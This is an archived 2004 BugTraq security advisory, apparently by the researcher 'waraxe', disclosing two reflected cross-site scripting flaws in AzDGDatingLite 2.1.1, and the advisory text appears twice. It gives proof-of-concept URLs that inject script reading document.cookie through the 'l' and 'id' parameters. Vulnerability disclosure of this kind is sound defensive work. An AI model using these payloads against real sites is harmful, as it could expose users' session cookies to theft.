BugTraq
Back to list
|
Post reply
[waraxe-2004-SA#014 - Cross-Site Scripting aka XSS in AzDGDatingLite]
Apr 08 2004 04:03PM
Janek Vind (come2waraxe yahoo com)
{=======================================================================
=========}
{ [waraxe-2004-SA#014] }
{=======================================================================
=========}
{ }
{ [ Cross-Site Scripting aka XSS in AzDGDatingLite ] }
{ }
{=======================================================================
=========}
Author: Janek Vind "waraxe"
Date: 07. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=14
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
AzDGDatingLite: Version 2.1.1 (probably older versions are affected too)
Writed by: AzDG (support (at) azdg (dot) com [email concealed])
Homepage: http://www.azdg.com
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Cross-Site Scripting in language variable:
http://localhost/azdlite/index.php?l=en"><script>alert(document.co
okie);</script>
2. Cross-Site Scripting in view.php:
http://localhost/azdlite/view.php?l=&id=00001<script>alert(documen
t.cookie);</script>
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe (at) yahoo (dot) com [email concealed]
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
{=======================================================================
=========}
{ [waraxe-2004-SA#014] }
{=======================================================================
=========}
{ }
{ [ Cross-Site Scripting aka XSS in AzDGDatingLite ] }
{ }
{=======================================================================
=========}
Author: Janek Vind "waraxe"
Date: 07. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=14
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
AzDGDatingLite: Version 2.1.1 (probably older versions are affected too)
Writed by: AzDG (support (at) azdg (dot) com [email concealed])
Homepage: http://www.azdg.com
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Cross-Site Scripting in language variable:
http://localhost/azdlite/index.php?l=en"><script>alert(document.co
okie);</script>
2. Cross-Site Scripting in view.php:
http://localhost/azdlite/view.php?l=&id=00001<script>alert(documen
t.cookie);</script>
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe (at) yahoo (dot) com [email concealed]
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------
[ reply ]